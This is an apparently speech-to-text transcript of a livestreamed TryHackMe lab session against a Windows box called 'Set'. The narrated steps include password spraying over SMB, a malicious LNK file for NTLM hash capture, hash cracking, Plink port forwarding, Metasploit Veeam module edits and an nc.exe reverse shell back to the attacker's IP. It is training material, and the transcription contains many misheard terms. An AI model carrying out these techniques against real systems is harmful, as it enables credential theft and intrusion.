All right, let's start up set. Start this guy up and we'll see what happens here. Oh boy. Now we have done a little bit of set so far. We got pretty far into it. I do remember having about 8 million users on here and it taking like an hour to do anything with. So as soon as I see a user's name, I feel like I'm going to remember it. Crap. Must have been after I deleted a whole bunch of stuff. Alright, so we have nothing in set like right now. We are going to have to get all those usernames into set. There's a bunch of them. But as soon as I see it, I'll remember it. So I'm only going to grab a few usernames. And we're just going to go from there. Yeah, I think last time we used like the top 20 most common usernames. And it took 1 hour to crack it. So I was like, yeah, I'm never doing that again. So that one was pretty miserable last time. And remember, all these boxes do go together. So we can go ahead and do a sudo nano Etsy host. And we can go ahead and get rid of this like right here. And we're going to have to add in set, I believe, down wincore.thm. I don't know if we got to add anything else. We'll figure it out through our mmap scan here after we throw an mmap at it, if it's up and running yet, and we'll do an mmap for port 443. That's some boots and root stuff. I don't know if I really call it CTF. That's what everyone's been calling them online, stuff like that. I don't know if I really call it CTF, though. I like to call it more boots and root style machines. Probably still starting up. Probably going to take about 5 minutes to start up. Oh, there we go. We got something here. You want mmap tac p 443. Let's see what we can get from here. See if we can see any other, instead of just set that wincore.thm, see if we see anything else. I kind of remember set. I remember finding user credentials somewhere. Not even user credentials, I remember finding user somewhere. And that was about all I remember. So it looks like we have set and Seth down wincore.thm. Looks like we have those two. So let's go ahead and do a... I'm going to stop this. We're going to restart the mmap scan again. And we'll do a sudo nano Etsy host. We'll go ahead and we'll throw Seth in there now. Alright, cool. Let's go ahead and run a rust scan on it because this thing's taking a while, seems like. We do have that port 443, so I'm thinking Fearox Buster on that guy. We'll start off with set. 5985 is up. That's good. So we'll run a Fearox Buster on that guy like right there. We'll try to get something with him, see what we can find. Let's go ahead and go to set.wincore.thm, see if we can find anything. Don't know how long it's going to take, so we just start up our Fearox Buster on him, but hopefully it doesn't take 2 hours to do it. Alright, so we're here. Alright, we got about, so it goes down the page, services, portfolio. Okay, nothing really in here. Team. Got some potential usernames like right here. We just have to figure out how the usernames actually are. We go down contact and see. We have info at Wincore, so that's not really going to help us out too much. We have a blog page And we also have pricing. Let's go ahead and see what's going on here. Hey, thanks a lot for the follow, Namya. Alright, so it looks like it's all by John Doe. Hey, thanks a lot for the follow, Gaia. Guy. Thanks a lot for the follow. Looks like it's all by the same person, John Doe here. And if we go to click to the next page, we don't get anything else. Just keeps going back up. So let's go ahead and let's see if we can find anything in here. We should probably start at the top of the page, not at whatever page we want to. So we should probably go back, and we'll scroll up, and we'll just do a Control U from here. Let's see if we can find any more users on here, because we know we do have some users, right? Clients, things like that. Or see if we can find user names somehow. I don't really remember much about this one. I just remember it taking a very, very long time to crack a password. What we got down here? Validate. Yes. Okay, not really seeing anything in here that point out to me too much. Let's go and check our Fearox Buster, see how that's doing. Looks like we got a lot. Okay, so we got a lot of different stuff going on in here so far. A lot of stuff in assets. Let's go and check out /assets because we got testimonials, team credentials. We have a lot of crap in assets. Looks like it really liked assets. Assets, forms, and then the rest of it's just assets. So let's go ahead and check out assets. A lot of stuff. Assets, testimonials. I really want to see that either client or team. But that's an image team. So I don't know how much that's going to help. But I also have assets data. Might be something we want to look into. Just try to see if this thing changes at all, that's all. Really likes that assets, huh? Okay. Assets in here. Go ahead and open that up in a new tab. Whoopsie daisy. Okay. Oh, there we go. Okay, we got assets, data, users, XML. All right, there we go. Let's go. All right, that'll work for the search function, like right there. Let's try that. Let's go ahead and try assets /data /users.xml. Let's see if we can get something like that. Or if that's actually going to be the users or the workers. Keep looking for assets. Testimonials. Those are all JPG files. Teams. We are getting the member info here, but we're not getting like usernames or anything like that just yet. Might have to get those guys broken up into usernames. Secure connection failed. Why? When do you think internet browsers are going to realize that I don't care? If it fails, just bring me there. Probably because this guy's still going like right here. This guy's probably not really helping out very much. Let's stop him. Pretty sure we're in the right place. There we go. Let's go. All right, so we have emails. So that's probably the username like right there then. So we could probably, but as you can see, we got a lot, right? So let's go ahead and actually do a wget for this. Let's pull this down and see if we can actually, what it's actually going to look like. All right, let's not do a wget. Let's just go ahead and just copy and paste, I guess. Sublime text users.text. Okay, so we can go ahead and we can get rid of all of that. Well, actually, we can get rid of all of that, and row. That's all it's going to do is just that, like right there. That sucks. I was really hoping to get rid of all of it. Okay, so we can go ahead and we can get rid of row and name. Or if we can go like that. Damn, nope. Well, let's get rid of row. It's probably a much easier way to do this. What if we get rid of phone? Nope, we just have to just get rid of phone. That's it. What about name, phone, email, phone over here, name over here? What about anything like that? Just gonna get rid of email. That's it. That's kind of annoying. Well, actually, maybe that wasn't annoying. Because now we shouldn't get rid of any... Oh, we're going to get rid of that one. So we could do a... I'll get rid of that and that. I think we want to get rid of Al's pet. Not too bad. That's gonna be pretty bad actually. Now that I look at it over on the right hand side. Probably there's a most likely a much easier way to do this with cut and everything like that. I'm just not smart enough with cut to be able to do it. Trying to find a username that tickles my fancy that I remember. So far, no. I think last time I did this box, I think I actually went to sleep. Woke up and then we had a username. Her. Myrtle Low. I remember that name. Let's copy that. I don't remember her password, but I remember that name. Okay, let's go ahead and go into MSF console. So I remember that name. Myrtle Low. And from here, what we could do is we could try to throw the seclist top 20 SSH passwords at it. And we can try to throw that under SMB. Or we can also try crack-map-exec, I guess, too. SMB, and we're going to throw that at 10.10.80.65. We have that. And then the password is going to be user share word list sec list. Should be passwords. It's like top 20 SSH or something like that. Common credentials maybe. Top 20 SSH. Let's try that like right there. Because then we won't be here for an hour trying to crack a password. I think that's the user. Myrtle Low. I remember that name. I remember Myrtle. Oh, I thought it was going to take a minute. I got excited. Hey, thanks a lot for the follow, Sarah Barrow. All right, we got one. There we go. We got one. So we now have a password for Myrtle Low. Let's go ahead and go a nano or echo. Myrtle Low with PASSWA @RD into user pass.text. That's not going to work. There we go. Okay. So now we have her in the user pass.text. Now let's go ahead and try again with SMB with her. If I remember correctly. Going to throw that in there. Going to grab that password. Hey, thanks a lot for the follow, Larry Kuvaturi. All right, so we got files in here. All right, let's go ahead and check out that files. And we also have an E drive in there, too. Is Diet Pie seriously in the top 20 most? I guess. Raspberry's in there. I mean, pie raspberry. Diet Pie, yeah. Guess if if you're on a diet and you got Raspberry Pi. dir info.text, go and get that. Oh, we got a flag, okay. Zip and save your project files here. We will review them. Let's go. I'm starting to remember this guy. We have to do an LNK. So we do an MS link, right? And then we're going to have an LNK file. And when you have that LNK file, you're going to have it call back to yourself. We're going to have responder up and running. Or actually, we just do an SMB server, I think, because the SMB server is still going to get that hash back on it, right? So, change it. Oh, crap. Be right back. Change all my paths. Is Diet Pie on there? Yeah, I'll be right back. So, whenever we do an MS link and we do a LNK file, the user actually doesn't have to even interact with that LNK file, if I remember correctly. I might actually have it in here, but these notes are newer than when we did this box, so we may not have it in here. So we'll probably make notes for it again. So we're going to do LNK file with MS-link. So we're going to throw these notes in here again, and we are going to do a period, I think it's just MS-link. Is that like right there? All right, so we got, it's in a different language. That's okay. So we got the link target, right? So we can say the link target. That's in a totally different language. This is not very helpful, is it? We could say name, working directory, arguments. I like how this part's in English and this part is not. I like that. That's super super productive if you don't think about it. Please no longer to Twitch. Okay, so we got the link file. We have to have a description. Link file. What is it? Where's it going? Right? Okay. We had to do 4 here because remember we are on Linux over here, so it's going to get rid of 2 of those. So that's why we're doing 4. And then we do 2 over here because we get rid of 1 of them, right? So we got 2, then 1. Okay. And then what do we want to call it, right? Will that work? I don't know what the fuck that says. Okay, well, we have a shared link now. Don't know if we need to make it executable. I don't remember that part, if we need to make it executable or not. But now we just need to zip it. So we're going to say zip. Oh, I suck at zipping stuff on freaking Linux. Is that it? Okay, cool. So now we have the zip file and the link file, right? So when they unzip it, they actually don't have to click on the link file. They said they were going to unzip it. So now all we have to do is just get them to unzip it. So now we got to go back into SMB client. Let's go ahead and start up in SMB server. And we're going to call it share. Okay, because that's what we set up here, right? We said //share, right? On 10.13.26.184. It's going to support SMB2 just in case. And the period is saying, hey, I want it in this directory. Because he is going to have to actually, you know. Well, I don't really know if he needs to be in that directory or not. But we'll say, hey, it's going to be in that directory because he is actually going to unzip that file. So let's go ahead and do a SMB client again. And it was PASSWRD. Was it capital P? Is that correct? Okay, cool. So let's go ahead and put share.zip now. And now we wait. And hopefully that works. Oh, shit was in a different language. I have no idea. If it does work, then I just got to copy this up here and just... But I don't know. It was in a different language. It wasn't very helpful. I don't know how long we're going to have to wait. Probably like a minute or 2 we'll wait. Oh, fireworks are going off. Should call back to me. Over to here. Should call back to me over here. I guess we'll find out. But the only one that I have like right there. Because it doesn't still doesn't seem to be working, huh? Let's go ahead and see using mslink.sh to create LNK file. GitHub. You see, we've obviously done this before. I obviously got mslink before. That was just link.py. Okay, let's try that one. lnk.py. Let's see if I have that. Oh, shit. Never mind. We got it. Let's go. All right. Let's freaking go. All right, let me just go ahead and press up over here so I can get those commands again. So we can go ahead and throw that into our thing. Let me actually cat that info.txt again. Go ahead, we'll copy that. There we go. Okay, then we'll go over to our tools and we'll press up until we find it. And we went ahead, we made that right. Then we zipped it. We start up an SMB server. I think we could also use responder for that too. Or also, and then from there, we got a hash back. And from there, we got this back. After waiting a few minutes, awesome. Let's freaking go. All right, let's crack that hash. Michael Watt. And let's also go ahead and remove that shared out link too. Oh, did I actually put them into here? Oh, I'm so smart. Oh, look how smart I am. So smart. All right, let's go ahead and let's do a nano hash.text. Throw that in there. Then we'll do a John hash.text. More of this rocky.text 4 equals 4. And we get something back. So let's go ahead and do a echo Michelle Watt. Excuse me, I called her Michael at first. Michelle Watt. And it's going to be Mickey Mouse. And we'll put that in user pass.text. Now we know that when our arm was up, right? Let's go ahead and CD into desktop, try Acme set. And let's go ahead and try to do an evil WinRM with her and get into it. Okay, and we'll go ahead and we'll change out that IP address to 10.10.80.65. And we can stop this guy over here, though he's going to keep seeing stuff. What's up, Lark Energy? Alright, so we are evil Wyndham, RM is her. Who am I / priv? Not too many privileges, okay? Who am I / groups? Now, if I remember correctly, there's something running internally on this guy. Net stat attack ANO. If I remember, there was something that was running internally on him. We found that before. I don't remember if we saw port 2805 open to the rear. Like whenever we very first did our map scan or West scan. I don't remember seeing port 2805 open, but it very well may have been. I have no idea. But 2805. No, it's connected to 127.00149.811. So we have to look at 2805. We have to look at that service. So we have to do a... That's the process ID like right there, right? We have to do a get process ID 3772. Should be get process ID. Is that what it is? Or is it TAC ID? Should probably put this over here also. Processes. That's one way to do it, I guess. We could also do a... Is it get process TAC ID? Yep, get process TAC ID, and then the process ID number. Don't know why I'm putting that like that, but alright, let's go ahead and let's look up what the hell V1 agent service is. Now I remember there was a Metasploit module for it, and that's about as far as we got. So yeah, we got that guy right there. We can use 0, show options, and I'm pretty sure what was happening was Defender was stopping us from doing everything. So we're going to set our L host to ton 0. And we can set our R host to there. I don't think we have to actually forward that port. We may have to actually forward that port. How would we forward it? With we use Plink to forward it. Right? Prep for Plink. Alright, cool. Plink.exe. Probably remove that other one. Okay. So we got Plink.exe. Let's go ahead and do a Python server over here. And let's go ahead. I guess we can try putting in our documents. .164 Plink.exe. Tech out file. Plink.exe. See if that works. Or if we're going to get denied. Grabbing it. Might have to go into C Windows tab. Okay, cool. We grabbed that. That's good. Now we can now forward that port out of there. So I'm actually going to do port 40 through Plink. Alright, I think I have a port 40 little thing like right in here somewhere. Port forward. Plink. Okay. Now, I don't really remember how to forward a port through Plink. Let's go ahead and look that up. Let's try this one first. Okay, we got something here. So this is gonna be a pain. I'm trying to remember how the hell we did it before. For Plink, we should. Let's look at the medium one. This might be a little bit better for what we're trying to do here. I have to do an echo just to make sure that we're actually getting it correctly. You know what I'm saying? Just to make sure that everything's coming through correctly. So we'll probably do like a... Is it echo and Y or echo Y and? Y and, I think. Hey, thanks a lot for follows, Berdis. Okay, echo Y and I'm pretty sure we're going to do period slash, and we're going to type in Plink. Ours is going to be Plink though.exe. It's not Plink32, right? Tech SSH, Tech L, my username. Okay, which I don't think actually freaking matters. I don't think it does. Okay, we'll try like that. We'll do my username of Callie. My password. Say Callie. My P, right? So now we're going to put in my P address. So 10.13.26.184. My port, we can just do it to freaking the same port that he's on, which was 2805. Going to 127.0.0.1, 2805. And then my P address, which is going to be 10.13.26.184. So I'm pretty sure we're now forwarding port 2805 to us. I think we are. We could always do an mmap scan. Connection refused. Is there like a TAC-N or something like that here? I remember something like that. I don't remember what the hell TAC-N was for, but I do remember something like that. Okay, connection refused. You can use Chisel. I have notes about it. Yeah, I have notes about Chisel also. But if I remember correctly, last time we were on this machine, Plink was like the only one that would work. Because we have been on this machine before. We got super far into it. And then we couldn't get any further. And I think I know why we couldn't get any further. But yeah, Plink I remember was the only one that actually worked. You know what though? Maybe this is why. Maybe because it's trying to do SSH, right? It might be because SSH is not enabled. Because I disable it every single time after doing something like this. And we got to start SSH. And then we can go ahead and try that again. Because this is trying to attack SSH. I think that's good. Let's go, I think. 2805 on 127.0.0.1. It's freaking open. Let's go. All right. Awesome. Now we have Plink. Well, first we got to do our thing up here. Yeah, I remember other stuff not working on here. I remember that. I remember having to use Plink, and that's the only reason we even have Plink was for this machine. All right. And then we do that, and we now have 2805 open. So now we can now try to run an exploit against it, but I'm pretty sure the exploit will not work because of Windows Defender. But we could try it. Hey, thanks a lot for the follow, ASAP Freddy. So let's go ahead and try to run an exploit, and we're going to set it to 127.0.0.1 as the R host, and then our L host. So we're going to set L host as ton 0, set R host as 127.0.0.1, and the port is 2805. That's correct. We can go ahead and do a run now, I think. And I don't think it's going to work because of Windows Defender. Interpreter session is definitely not going to work because of Windows Defender. So we're going to have to definitely pick something else other than interpreter session. But I think we have to execute a command. What I think we're going to have to do is I think we are going to have to get into this guy like right here, right? And I think we're going to have to actually do more stuff with him. Let's go ahead and do a show option or show payloads for this thing. Let's see what type of payloads we have. But I think we have to actually locate him, get into him, and actually mess with him. Let's go ahead and do a... Let's just try shell reverse TCP at first. Even a payload generic. We'll try something like that. But I don't think... I think Defender is not going to let it call back to us. I think that's what the problem is like right now. I don't think it's letting any connections out. So we have to do something inside of it. Right? And this was kind of my hunch last time. But we already been working on the box for like hours at that point. Try hack me. And this one is called set, correct? Okay, let's go ahead and locate. What are these files even called? Let's try to locate this guy right here. Okay, we want the Ruby file, right? We want to look at him. Because you can mess with the files. And what we also want to look at is one that can run a command execution, which... RM, can that run a command? Script execution, Ruby. I mean, that looks pretty good, right? Let's see what this guy can run. Okay, so we have commands here. So all we really need to do is just put another target into there. Just type edit in the module? How do I do that? What do you mean? Just type edit. So, hydrate. Oh, man, you're killing me. What, edit? Oh, my God. Let's freaking go. Oreo, give me 1 second. I found a random Coca-Cola Classic. Look at that. Oh, crap. It drops me into Vim? Oreo, that's the worst idea ever. Now I have to get out of Vim. Yo, is this thing going to let me out with just a quick fucking WQ? Of course not. I hate Vim, Oreo, because you have to exit it at some point. I absolutely despise Vim. Because exiting Vim it's not going to be WQ because you have to put the exclamation point in. Then it has to be ran under sudo. But we're not running under sudo like right now. So then we have to get all the way out of Metasploit, go back in, run it like that. No, I'm not doing it. Okay. So I think we want a command, but what we're going to do is we're going to end up putting a command in to pretty much add a user. That's what we want to do. Okay, so we're going to put in an execute command, right? So I want to find a Windows module that can do an execute command. So let's go ahead and use exploit Windows miscellaneous. Let's see what's in here. Yes, all 107. Yes, please. Big Ant server should be able to do it, actually. I think it should. You should be able to do some type of execute command, right? Windows execute. That's what I want, like right there. So if we set the payload to that, and then we do an edit, like we were taught earlier today, which is freaking awesome. I want to try to figure out where that command is, so we kind of utilize that one, that Windows execute edit, to be able to see how to write it somewhere else. Which I think I might actually have an idea. Well, this thing doesn't help out at all, does it? With the edit command here. I want to edit Windows execute. That's what I want to look at. Yeah, thanks, but I hate it. That's good. All right, so we want to have a Windows execute command under, what is it? Targets. Okay. We want to add in a Windows execute command under targets. So if we go, okay, right in here. So see how we got the interpreter commands, everything like that? So we want to add in, so we got Windows dropper. We want to go ahead we want that, right? Comma at the end. And what we want to do is we just have to name it something here. All right, because we just have a name. Does this thing already have a Windows execute command on it? Hold up. Hold up. I thought I just looked for it. Okay, never mind. We already have a Windows execute command on here. I don't see why we'd have to change anything up. Let's go ahead and set the command to, we'll say, net user Ryan add. Can we run that? I don't want a session. That's fine. We don't need a session. No session should have been created because we didn't actually try to create anything there. Go ahead and do that. It's going to be Michelle Watt. And let's go ahead and do it for their IP address. I just want to see if I was added in there. Of 10.10.80.65. I see no Ryan in here. Damn. So I was not added in there. Okay. Okay. Let's think about this. That's not what I want to make. Okay, whatever. Then you can keep that directory. Let's try to put netcat on here. Use basic parsing. 26.184 / nc64.exe. Out file, we'll call it nc.exe. And then we'll say netcat, I'll be up P1, 2, 3, 7, sure, why not? Okay, then we'll say set command. And we'll say to c temp nc.exe tac e command for 10.13.26.184 1337. See if that works. See if we get a callback. I wonder if this is a 32-bit program running on a 64-bit machine. That's why it's not working, and that's why we I'm thinking we need like an NC like set command 64 executable. Okay. Arc is going to be x64, right? I think. And we have to do a 64-bit payload, right? That's what I think. Oh, God. This is not going to work out very good. Our command. At least it's like auto-complete and stuff for me. You know what I'm saying? Like, it kind of knows what I want, right? I mean, it understands it, right? All right, we'll do a type. Right? Do I have to put those little things around it? Probably. Everyone else has those little things around it. So type. I mean, I've written a buffer overflow in Ruby once. One buffer overflow. Lowercase temp. What do you mean? Over here? That's not going to matter. Windows doesn't care. Windows doesn't give two flying shits if it's lowercase, uppercase. It doesn't care. You can put in the lowercase for username. All lowercase. They can be uppercases. You can put it all lowercase for username. It doesn't care. The only thing it cares about is passwords whenever it comes to case sensitivity. See? Yeah, Windows is weird like that. Well, I think Linux is weird like that. I think it should just, that shouldn't care, but it does. Okay, so the type. So we got win. Just gotta figure out where the hell win command is at. Down lower. And then we just keep going, right? Default options. I gotta just, right? Yeah, that sounds right. Sure. Do that guy right there. And then we're going to say payload. That's what everyone else said. Yeah, we got this. This is going to be an easy day. We got this. Easy freaking day. I think I already messed up, though. I think I'm already supposed to have one of these guys like right here. Okay. Yeah, this is going to be an easy day. We got this. All right. So the payload should be a Windows x64 executable. Because this is for command Windows PowerShell reverse TCP. We just want executable, right? Now the other one was just a regular Windows executable. Now we have a Windows x64 executable. The other one was just running a regular, our other payload was just running a regular one. So now we have that. Does anybody have anything that they say that's 100% wrong? If not, then forever hold your peace. I'll leave it there for a second. I'm still thinking we need to figure out what the hell this guy's up here is, this win command, because we need to be able to go ahead and look at what else he has to be able to change everything else to that. Oh boy. That's all I know. That's really the only idea I have, like right there. I have no idea what else to do. That's about all I got, like right there. Let's save that. I can always change it back to what it was before. Let's save that for now. So that's saved. Let's go ahead and do a show options for this thing. Well, I gotta set the payload now, right? To something else. If I get the exit out of it, go back into what I'm thinking. That's what I'm thinking. Right? Should we have... We probably should have changed the name of it. Oh, God. Alright, let's go ahead and actually... Save as... Permission denied. Good. Why can't you just... Like, do it with... Why can't you just ask me for a password then? Okay, that's kind of annoying. Why you just ask for a password then? It can flag etc.exe, yes, but I don't really have much of another way. I bet you there probably is ways on here, but I'm pretty sure this is how we're supposed to do it. If we can't get it this way, we're just going to go another way. Let's try to just add a user. I don't know if we even can add a user to this. Oh, x64. What if we have it execute? Let's try something else here. I think I'm going way too hardcore here. Could we actually have it execute PowerShell? Oh yeah, we could have it execute PowerShell, couldn't we? I mean, we can have it execute command and call for PowerShell. In case you guys are wondering which one the EX one is, that's the one that that's the one that is the one that can already run stuff. That will already call back to me. But we do need it to change up that port, I think, because I think we already used it up here, didn't we? No, we did not. Let's go ahead and cat that guy. Like real quick, see what port we're supposed to be on here. I believe it's 4444. It is. Or no, 2222. So let's try that. NC tag LVNP for 2222. Can we do this like right here? I think we're going way too hardcore with this thing. Oh. What the hell's happened? One number of arms, given one expected 0. What? What is that? I don't know what that means. Let's go ahead and copy that. I wonder if we can just do this like right here. Let's go ahead and use... Oh shit, story time? Oh shit, Oreo. So when I started streaming, I actually started streaming just to take notes for myself. That's why I started streaming. Good morning, Thomas One. How you doing? Yeah, I started streaming to take notes for myself. And well, my very first time I ever streamed, I was actually playing video games. I just want to see what, you know, never heard of it, never seen it before. One of my buddies did it, so I was like, oh, that looks like fun. Thanks a lot for the follow, Thomas One. I was like, oh, that looks like fun, you know, whatever. Played some video games. 0 people watched. I didn't really care. Played Doom Eternal. But I was like, oh, something else to do, and I really want to see like how the computer would take it, you know, because I built my own computer and stuff like that. So I want to see like what it would do. You know, let's put some stress underneath it. Then I stopped, you know, and then I started doing this stuff, and I started streaming more for my own notes and things like that. It didn't really happen until freaking Chad B Noob and GoPro Slow Yo found me, that other people actually found me, stuff like that. But yeah, I was more or less just streaming just for my own notes and putting it on YouTube for my own notes. My YouTube channel ended up getting shut down, but you know. But yeah, that's literally why I started streaming, like right there. I think this is why it's fucking up, like right here. I think that's why. That's why I was trying to change the target. Windows execute. What if I can do that? Can I do this like right here? I do have a Python server still up, and we haven't seen anything actually come back and even try to grab that yet, that file. Like right there, have we? And we just go into HP 10.13, 26, 184, invoke PowerShell, and it's not even hitting up here at all. Huh. Yeah, it's not even hitting over here at all. Not even calling back to me. Oh, see if it's even, yeah, see if we can even do it. Well, right now we're running PowerShell. We're running a PowerShell script that should be blocked. Yeah, we can try that. Just try like a netcat. Just try to call back to myself, you're saying? You just want me to do a quick little, maybe on 2222 or whatever. Just /netcat.exe. Tac E command 10.13.26.184 on port 2222. Nope, it's not blocked. Good call though, good thinking. Make sure that it's not actually, you know, we're sitting here trying to do all this stuff and it's actually blocked. That's a good call. Good thinking with that one. Let's try and run this with netcat though. Let's say command or set command to be that. Where do we upload that to? C Windows 10. C temp. Good thinking. That was a good call. This thing, it really won't even call back to me, will it? Okay, let's go ahead and let's exit out of here. We're actually going to reopen that with Sublime this time. Let's go ahead and grab what I wrote in. I did all of this, right? We did from right here down to here, right? Let's go ahead and Control Z everything. We'll get rid of all that. Get it back to normal. And what we're going to do, we're going to open up a sudo this time. We're going to add in another one. There. So that guy's back to normal, right? Let's go ahead and do a sudo. Shit. You gotta locate that again. Okay. We want to actually do a sudo sublime. Hey, thanks a lot for follow RXDR0SX. Alright, sudo sublime user share Metasploit framework modules, exploits, windows, miscellaneous, Veeam. Right, now we should be able to do whatever we want with this. So we should be able to file, save as, and we're going to call this underscore Ryan. Okay, cool. So now there should be an underscore Ryan one. Now we should be able to come into here. Whoops, I messed up. Okay. Should be able to put that guy in there. Save him. And now we should at least be able to see that that is something. So now we can go ahead and we can use exploit Windows, miscellaneous, Veeam. There should be another one called Ryan now. Should. Good. I'm glad that worked really, really well. I don't know why there isn't, because we should have it now, because it's literally called that. Ryan.rb. Or if we need to exit out here and go back into it. Yeah, reload it. Oh, whatever. It's okay. We'll type in reload here in a second. It's okay. Reload ain't even a command. Okay, use exploit Windows miscellaneous Veeam. Why does it keep doing that? I figured at least load it. One line pattern matching experimental and behavior may change in future versions of Ruby. Okay, I don't care. Oh, it's because of that, like right there? Is that what's happening? And is it also because I never actually closed out of it correctly? So if I look up here, I have that one like right there also. So why does he have... What's he closing out like right there? Okay, this guy's closing out right here. So he's got that closed and he has it open going into here. Boom, boom. All right, that looks good. Going down one. He's actually more over here, isn't he? This guy's over. This guy's over. Is that right? That's correct. Yeah, that looks correct. Okay. So far, all that looks correctly right there. This guy's actually over one. That guy's over like that underneath the E. Okay. This guy like right here, he's good because he's for him up there. He's for that one like right there. He's for that one up there. He is for fucking something. Or is he just saying, hey, that's the end of the file or some of that. We'll try to save that and we'll try to do reload. I mean, this file ain't going to work. I know that. This file is 100% not going to work. I know that much like right now. I at least want to be able to get into it and say, oh, look, there it is, you know. Okay. We're missing more stuff here. We got to do something else. So, I'm thinking we could put a command in now, which I got a comma behind him. Now I can put a command in, right? And then we can change this out to be the netcat thing that we have. Or was it in ctemp? I think it was in ctemp. Ctemp. Now whenever this guy loads up, he should just load that, right? Okay. Alright. There should be more shit that we have to change, though. There's our wind command. There's our wind dropper. Okay. We're finding more shit. Alright. So we're going to change something in here. When we called ours wind command 1. I don't know if this is supposed to be arch command. Or if it's supposed to be, it's probably supposed to be this like right here. That's probably what it's all yelling at me about, huh? Let's go ahead and change that out like right there. We did call ours wind command 1, right? So we should now, because that's a type. So now if we come down to type, right? We should have to change, where'd type go? Type, we should have to put wind command 1 in here now, right? So when wind command 1, I take it? Wind command 1. And we are going to execute a command, right? There we go. Execute the command in the data store, right? So we got execute command, data store, okay, and then whatever the command is, right? Should that be good? Command. Okay. Leave that up there for a second and see if anybody has a problem with that one. Let's save that. All right, Control S the crap out of it. It's saved. Let's exit out Metasploit, go back in, and let's see if that actually works. What if I have to actually exit out here also for it to actually work? Like if I can't have it open. Still doesn't seem to like stuff. Still only likes to go with that V1. And it's not showing mine whenever I do that. So there's still a problem in here. There's got to be something up here. Gotta be something up there. Ooh, maybe because of this? It's not a comma like right there. And there's not, probably because I can see what's talking about that now with that one line saying, hey, you can't one line shit. Got it. Okay, because I didn't put commas anywhere to separate it all. Okay, let's try to save that. Let's do it again. PowerShell. I mean, we're not even really doing PowerShell like right now. This is nothing to do with PowerShell. We're just going to try to execute a Windows command. We're actually just going to execute a command prompt command. Everything else has commas behind it. Let's see if we get it. Oh, we didn't get the error, I don't think. Did we get? Oh, yeah, we did. Never mind. Well, that was stupid of me. So, can we search for Veeam again? Okay, we're not seeing ours. Okay, still not pulling up ours. All right, let's exit out of here again, and we'll see what else we still got fixing here. Because if it's not seeing ours, then we can't run ours, right? So we just got to figure out what else do we need to fix in here, thus allowing us to finally, hopefully, be able to run that command. That all looks pretty good. I think it all looks pretty good. I don't fucking know. I have no idea. Maybe because, see how R-type is sitting in that thing and this one is not? That could be another problem. Okay, let's go ahead and save that. Alright, that could have been a problem like right there. Let's go ahead and try to run that one, I guess. Nope. 91, 97, 98. Are those the lines that are messed up? Here's 91. Here's 97. Here's 98. We didn't even touch these fuckers. 91 we didn't touch either. I'm thinking it has to do something with... So we put this guy all the way at the very end, like right here, right? I think it has to do something with that. I don't fucking know. I have no idea. I guess we could always open up the other one, right? See what the other one looks like, the normal one, like right there, since we control Z back from everything. See, it's got the comma like right there. So ours is looking... Where the hell's the other one at? Where's ours at? Right here? Okay. So this is our command like right here, right? That looks good, looks good. Come down, looks good, good. Okay, okay. Just look at the very last one, okay, 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 okay. 2 comma. Notes. That. Now we have port 2805. We're typing in command. We got comma. We didn't really mess with much down here, comma. Okay. We didn't really mess with much below that, did we? Yeah, we messed with this like right down here. But we just said when. Really messed with one part down. When command 1, SU command, command. Which is up here for command. Execute command in the data store. Command. I don't know. I have no idea what to do with that. Maybe we still need, because I deleted other stuff out of here, right? I deleted all this out of here. Maybe we still need that hostname info in there. And that would go up here, right? So I think we'd want to do... See, as that one going all the way down to ours now, right? And then go ahead and run this one like right here. Or if we need the whole thing, the whole offstring thing. Offstring new, we need this whole thing. Like right here, I think. Copy that. Paste that in there. Okay. Maybe that's our problem. I don't know. Now we're running both of those guys. Let's save that. And let's see if we get same problem with the file again. So we have more problems now. 91, 97, 98. What are you trying? One line pattern matching. I don't know what you're trying to tell me there. 91, 97, 98. One line pattern matching. But line 91, okay, is that just because we just have to do that? Like, that makes no sense to me why it's saying that, like right there. That's not even our file. This one's not even ours. This one's ours. 91. It's the default target part. It's right here. Which that looks the exact same as this over here because we didn't mess with it. 97 is the reliability part. 98 is side effects part. But we didn't mess with any of that like right there. So now I'm really confused. It's the same thing on each side like right there. There is no difference there. That guy's for him. That guy's for him. This guy, I have no idea what the hell that guy's for, in all honesty. But he has one too. I have no idea what the hell it's for. So that's for him. Then this guy closes out the whole damn thing. Yeah, he probably closes out the whole damn thing, huh? Yeah, he probably closes out all the way up there or whatever. Okay. What is it talking about with this one-line stuff? That's why I don't understand. I don't know. It all looks the exact same to me, so I have no idea. But it all looks pretty much like the same exact thing. I think it does at least. I feel like it does. Name it. Arc equals maybe? I don't know if that would have anything to do with it, but we try. I don't know. There's no one-line pattern matching, dude. I don't know what you want me to do, man. I really don't understand what you want from me. Like right here. I really don't. Is it because I named something incorrectly or something like that? Did I like... I don't know what you want from me, Ruby. I really don't know what you want from me like right now. Is it not supposed to be typed like right there? Is that like where I messed up at? I feel like that's just fine because everything else was underneath type, including Windows command. I have no idea what it wants from me. Got no idea. Whoopsie daisy. Calculate system info. Oh, of course it's denied. All right, cool. You know, everyone needs to know what system info is. Everyone knows about that. It's gonna say it can't run on that, or it has to be the correct type or something like that. Shit. It's gonna say you can't do that. We can't get Ruby to fucking work. I don't know what else to do. In all honesty, I have no idea. So we'll let that thing go ahead and do its thing. But I don't know. We'll just keep trying stuff, I guess. Wonder what it is vulnerable to then. Or if it's vulnerable to anything else. If it's vulnerable. That's the real thing. We have to get that fucking Ruby file to work. That's all I know. We have to get that guy to work to be able to do anything. Other than that, I don't think this is actually going to work without getting that guy to work. So, I mean, this is, I don't know enough about Ruby files to be able to do this, to be able to add something else into there. I figured it would work just because, you know, it was working pretty good. Like, we've kind of traced along what everyone else is doing. Just in case. Alright. We have to figure out what the hell to do with this Ruby file. Everybody else seems to have that. I'm wondering if I can do something like that. do that. He goes there. He goes here. And that last one like right there. Save that. Okay, let's try again. I'm gonna go with no. Don't know what you're telling me here. Like, we didn't really add much in there. We didn't add much at all. It's just the copy and paste of your other fucking one, dude. What do you want? Is the other one jacked up now or something since we messed with it and then we fucking saved it like a dumbass? Might have been, actually. May have actually been jacked up because I saved it like a dumbass. So I just pressed Control Z some more, and then he started doing more stuff. So hopefully I undid everything that we did before. Now we're going to have to like re-download this thing somehow. So I'm going to copy that. Hey, thanks a lot for the follow, Brew Hugly. Well, I feel like if he was messed up, though, we would have got two things that were messed up. Okay, so we just copied that right. Let's go ahead and we'll put him into another, we'll say nano. Okay, I want to copy that. Excuse me, I want to actually copy this like right here. Okay. It looks the exact damn same. I really don't know what the hell it wants from me. Alright, let's go ahead and copy this down here. Right. And let's go ahead and copy this like right here, right? Okay, let's go ahead and copy this guy right here that we made. I'm thinking that should be it, but I mean, like, I feel like if it was messed up still, then it would 